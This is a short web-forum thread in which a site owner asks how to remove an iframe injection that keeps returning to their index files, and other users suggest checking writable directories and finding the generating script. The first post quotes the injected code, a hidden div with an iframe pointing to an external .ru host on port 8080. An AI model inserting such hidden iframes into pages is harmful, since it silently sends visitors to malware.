Welcome Guest, Not a member yet? Register   Sign In
my source website have virus frame

[eluser]minhbu[/eluser]
how clean virus frame in my source code.I was delete file index.php,index.html,......but Sometimes virus delete file index.php on root. So my website can`t run.I very depression
this is source frame virus insert into my file index.html
<html>
<head>
<title>403 Forbidden</title>
</head>
&lt;body&gt;&lt;div style="display:none">dxmmimvuljmnfqwhhqzrazrlsvtckgn&lt;iframe width=835 height=987 src="http://the-past.ru:8080/index.php" &gt;&lt;/iframe></div><div style="display:none">dkzewskxkugfejeflscvtxbcpkbvmbf</div>

<p>Directory access is forbidden.</p>

&lt;/body&gt;
&lt;/html&gt;

thanks every body

[eluser]bitist[/eluser]
[quote author="minhbu" date="1254380520"]how clean virus frame in my source code.I was delete file index.php,index.html,......but Sometimes virus delete file index.php on root. So my website can`t run.I
[/quote]

Even you delete the index.php that is recreated. You should check your web server and look for directories with write permission. Check the files on those directories.
Also you could download all the files to you local PC and look for the code which is auto created.

Good luck.

[eluser]Azraf[/eluser]
I've faced problem like this. First, as vanyinet said, you have to find out the script which generating the frames.

Have a good journey.

[eluser]minhbu[/eluser]
thanks vanyinet,azraf supported me.I `m chmoding file index.php and other files to 444

Theme © iAndrew 2016 - Forum software by © MyBB